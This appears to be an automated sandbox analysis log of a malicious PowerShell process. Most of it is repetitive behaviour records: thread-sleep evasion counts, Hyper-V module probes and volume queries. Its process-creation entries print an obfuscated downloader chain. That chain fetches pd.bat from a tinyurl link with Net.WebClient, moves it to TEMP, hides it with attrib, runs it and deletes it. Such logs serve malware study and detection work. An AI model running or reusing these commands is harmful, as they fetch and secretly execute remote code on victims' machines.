Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3964
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3177
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2052
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1084
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1529
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 948
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4417
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2605
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2056
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1485
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1124 | Thread sleep count: 3964 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4692 | Thread sleep count: 50 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1536 | Thread sleep count: 3177 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6988 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4144 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5324 | Thread sleep count: 2052 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340 | Thread sleep count: 45 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4120 | Thread sleep count: 1084 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5088 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5408 | Thread sleep count: 1529 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5596 | Thread sleep count: 40 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6196 | Thread sleep count: 948 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7020 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5048 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6116 | Thread sleep count: 4417 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5068 | Thread sleep count: 49 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6220 | Thread sleep count: 2605 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7028 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456 | Thread sleep count: 2056 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668 | Thread sleep count: 54 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456 | Thread sleep count: 1485 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7036 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1968 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5008 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1124Thread sleep count: 3964 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4692Thread sleep count: 50 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1536Thread sleep count: 3177 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6988Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4144Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep count: 2052 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5340Thread sleep count: 45 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4120Thread sleep count: 1084 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5088Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5408Thread sleep count: 1529 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00C799DE FindFirstFileNameTransactedW, 12_2_00C799DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_00C79C6E FindFirstFileNameTransactedW, 12_2_00C79C6E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 12_2_07A8DEB8 GetSystemInfo, 12_2_07A8DEB8
Source: powershell.exe, 00000006.00000002.453514717.0000000005C91000.00000004.00000001.sdmp; powershell.exe, 00000009.00000002.467824625.0000000005B5C000.00000004.00000001.sdmp; powershell.exe, 0000000C.00000002.438730786.0000000005098000.00000004.00000001.sdmp | Binary or memory string: Hyper-V
Source: powershell.exe, 0000000E.00000003.460310051.0000000008BB9000.00000004.00000001.sdmp | Binary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1s
Source: powershell.exe, 0000000F.00000002.466078174.00000000090E0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000006.00000002.453514717.0000000005C91000.00000004.00000001.sdmp; powershell.exe, 00000009.00000002.467824625.0000000005B5C000.00000004.00000001.sdmp; powershell.exe, 0000000C.00000002.438730786.0000000005098000.00000004.00000001.sdmp; powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmp | Binary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 0000000E.00000003.465011614.0000000008B96000.00000004.00000001.sdmp | Binary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: powershell.exe, 0000000E.00000003.465164775.0000000008BB9000.00000004.00000001.sdmp | Binary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxmld1
Source: powershell.exe, 0000000E.00000003.460310051.0000000008BB9000.00000004.00000001.sdmp | Binary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1d
Source: powershell.exe, 0000000F.00000002.466078174.00000000090E0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 0000000E.00000003.460310051.0000000008BB9000.00000004.00000001.sdmp | Binary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: powershell.exe, 0000000E.00000003.465011614.0000000008B96000.00000004.00000001.sdmp | Binary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 0000000F.00000002.466078174.00000000090E0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 0000000E.00000003.460310051.0000000008BB9000.00000004.00000001.sdmp | Binary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dllO
Source: powershell.exe, 0000000F.00000002.466078174.00000000090E0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Command line: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Command line: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Command line: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Command line: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Command line: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\attrib.exe | Command line: 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
